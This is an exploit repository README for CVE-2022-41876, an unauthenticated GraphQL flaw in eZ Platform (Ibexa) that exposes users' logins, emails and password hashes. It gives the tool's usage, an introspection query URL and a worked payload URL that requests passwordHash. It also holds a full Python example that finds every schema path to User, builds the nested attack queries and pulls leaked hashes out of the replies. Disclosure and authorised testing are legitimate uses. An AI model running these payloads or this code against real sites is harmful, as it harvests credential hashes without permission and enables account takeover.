Skileau / CVE-2022-41876

PoC for CVE-2022-41876


(Ibexa logo)

Badges: Python 3.9 | Twitter: @Skilo, @TahiTi

CVE-2022-41876 - eZ Platform user information disclosure

A vulnerability in eZ Platform (Ibexa) lets an unauthenticated user read the password hash of every contributor through the GraphQL API. This PoC enumerates every GraphQL path that leads to a 'User' object and then queries each of those paths to retrieve the users' confidential fields (login, email, passwordHash, ...).

Usage

python3 cve-2022-41876.py -h
usage: cve-2022-41876.py [-h] [-t] [-f FILE] url

CVE-2022-41876 POC

positional arguments:
  url                   Target URL (specify the graphql endpoint)

optional arguments:
  -h, --help            show this help message and exit
  -t, --thread          Number of threads
  -f FILE, --file FILE  Local path to introspect file

Results

(screenshot of the tool's output)

How it works?

The different steps followed by this tool to exploit the CVE are:

Retrieving introspect file

The first step is to obtain the server's introspection result (the introspect.json file that the -f option can also read from disk). One way to retrieve it is to send the standard GraphQL introspection query to the endpoint; if the server answers this with an error, introspection is disabled and the schema has to be obtained another way:

https://<your-url>/graphql?query={__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name%20description%20locations%20args{...InputValue}}}}fragment%20FullType%20on%20__Type{kind%20name%20description%20fields(includeDeprecated:true){name%20description%20args{...InputValue}type{...TypeRef}isDeprecated%20deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name%20description%20isDeprecated%20deprecationReason}possibleTypes{...TypeRef}}fragment%20InputValue%20on%20__InputValue{name%20description%20type{...TypeRef}defaultValue}fragment%20TypeRef%20on%20__Type{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name}}}}}}}}

Finding paths to User objects

The JSON returned by the server can then be fed to the tool graphql-enum-path to extract every path that leads to a 'User' object, like this:

(screenshot of graphql-enum-path output listing the paths to User objects)

Requesting found paths to get users' data

Finally, once all the paths are known, a query is crafted for each of them by nesting the path's field names and requesting the sensitive User fields at the leaf:

https://<your-url>/graphql?query={element1{element2{element3{...{id,name,login,passwordHash,email,enabled,maxLogin}}}}}

where the elements are the field names shown between brackets in the graphql-enum-path output (one query must be sent per path).

So, with the graphql-enum-path example above, the first payload would be:

https://<your-url>/graphql?query={_repository{location{contentInfo{contentType{creator{id,name,login,passwordHash,email,enabled,maxLogin}}}}}}

If the server is vulnerable to this CVE, it answers that unauthenticated query with a JSON document containing the users' data; a non-empty passwordHash value in the reply is the indicator to look for.
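The three steps above, worked through in one added Python example (this is not the repository's PoC code): it walks an introspection result to every field path that ends in the 'User' type, renders each path into the nested query shape shown above, and inspects a reply for leaked hashes. The introspection document and the two server replies embedded below are constructed stand-ins for a real eZ Platform schema; the 'owner' and 'children' fields, the target hostname and the hash value are assumptions made for the example.

```python
"""Find GraphQL paths to 'User', build the nested query, check the reply.

Added example for this README, not the repository's PoC code. SAMPLE_INTROSPECTION,
VULNERABLE_REPLY and PATCHED_REPLY are constructed, cut-down stand-ins; the
'owner' and 'children' fields do not come from the README and are assumptions.
"""
import json
from collections import deque
from urllib.parse import urlencode

# Fields requested from each User object, as in the README payload.
USER_FIELDS = ["id", "name", "login", "passwordHash", "email", "enabled", "maxLogin"]


def _obj(name):
    return {"kind": "OBJECT", "name": name, "ofType": None}


def _scalar(name):
    return {"kind": "SCALAR", "name": name, "ofType": None}


# Constructed introspection result in the shape of a __schema query reply.
SAMPLE_INTROSPECTION = json.dumps({"data": {"__schema": {
    "queryType": {"name": "Query"},
    "types": [
        {"kind": "OBJECT", "name": "Query", "fields": [
            {"name": "_repository", "type": _obj("Repository")}]},
        {"kind": "OBJECT", "name": "Repository", "fields": [
            {"name": "location", "type": _obj("Location")}]},
        {"kind": "OBJECT", "name": "Location", "fields": [
            {"name": "contentInfo", "type": _obj("ContentInfo")},
            # self-referencing list: a naive walk would loop here forever
            {"name": "children", "type": {"kind": "LIST", "name": None, "ofType": _obj("Location")}}]},
        {"kind": "OBJECT", "name": "ContentInfo", "fields": [
            {"name": "contentType", "type": _obj("ContentType")},
            {"name": "owner", "type": {"kind": "NON_NULL", "name": None, "ofType": _obj("User")}}]},
        {"kind": "OBJECT", "name": "ContentType", "fields": [
            {"name": "creator", "type": _obj("User")},
            {"name": "identifier", "type": _scalar("String")}]},
        {"kind": "OBJECT", "name": "User", "fields": [
            {"name": "login", "type": _scalar("String")},
            {"name": "passwordHash", "type": _scalar("String")}]},
        {"kind": "SCALAR", "name": "String"},
    ]}}})


def named_type(type_ref):
    """Strip LIST / NON_NULL wrappers and return the underlying type name."""
    while type_ref is not None and type_ref.get("name") is None:
        type_ref = type_ref.get("ofType")
    return None if type_ref is None else type_ref["name"]


def find_paths_to_type(introspection_json, target="User", max_depth=10):
    """Breadth-first search from the root query type; returns field-name paths.
    A type already on the current path is never re-entered, so cycles such as
    Location.children -> Location cannot make the search explode."""
    schema = json.loads(introspection_json)["data"]["__schema"]
    objects = {t["name"]: t for t in schema["types"] if t["kind"] == "OBJECT"}
    root = schema["queryType"]["name"]
    paths, queue = [], deque([(root, [], {root})])
    while queue:
        type_name, path, seen = queue.popleft()
        if len(path) >= max_depth:
            continue
        for field in objects[type_name].get("fields") or []:
            nxt = named_type(field["type"])
            if nxt == target:
                paths.append(path + [field["name"]])
            elif nxt in objects and nxt not in seen:
                queue.append((nxt, path + [field["name"]], seen | {nxt}))
    return paths


def build_query(path, fields=USER_FIELDS):
    """Render ['a', 'b'] into {a{b{id,name,...}}}, the shape used in the README."""
    query = "{" + ",".join(fields) + "}"
    for name in reversed(path):
        query = "{" + name + query + "}"
    return query


def build_url(endpoint, query):
    """GET form of the query, URL-encoded like the payloads above."""
    return endpoint + "?" + urlencode({"query": query})


def extract_users(response_json, path):
    """Follow `path` through a GraphQL reply (flattening lists on the way) and
    return the objects found at the end; an empty list means nothing came back."""
    nodes = [json.loads(response_json).get("data") or {}]
    for name in path:
        step = []
        for node in nodes:
            value = node.get(name) if isinstance(node, dict) else None
            if value is not None:
                step.extend(value if isinstance(value, list) else [value])
        nodes = step
    return [n for n in nodes if isinstance(n, dict)]


def leaked_hashes(response_json, path):
    """login -> passwordHash for every user whose hash came back non-empty."""
    return {u["login"]: u["passwordHash"]
            for u in extract_users(response_json, path) if u.get("passwordHash")}


CREATOR_PATH = ["_repository", "location", "contentInfo", "contentType", "creator"]
_USER = {"id": 14, "name": "Administrator", "login": "admin", "email": None, "enabled": True, "maxLogin": 0}
# Constructed replies: a vulnerable server echoes the hash, a fixed one returns none.
VULNERABLE_REPLY = json.dumps({"data": {"_repository": {"location": {"contentInfo": {"contentType": {
    "creator": dict(_USER, passwordHash="$2y$13$EXAMPLE.constructed.hash.not.a.real.value")}}}}}})
PATCHED_REPLY = json.dumps({"data": {"_repository": {"location": {"contentInfo": {"contentType": {
    "creator": dict(_USER, passwordHash=None)}}}}}})

if __name__ == "__main__":
    for path in find_paths_to_type(SAMPLE_INTROSPECTION):
        print(build_url("https://target.example/graphql", build_query(path)))
    print("leaked:", leaked_hashes(VULNERABLE_REPLY, CREATOR_PATH))  # {'admin': '$2y$13$EXAMPLE...'}
    print("leaked:", leaked_hashes(PATCHED_REPLY, CREATOR_PATH))     # {}
```

On a real target the paths come out of the live introspection result instead of SAMPLE_INTROSPECTION, and fields that take mandatory arguments (for example a location id) need those arguments added to the rendered query; the search and the reply check are otherwise the same. Because every type is entered at most once per path, the number of queries stays bounded even on schemas with many back-references.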

References

Hacktricks

graphql-enum-path

Credits

This PoC was created by @Skilo and @TahiTi

License: MIT License
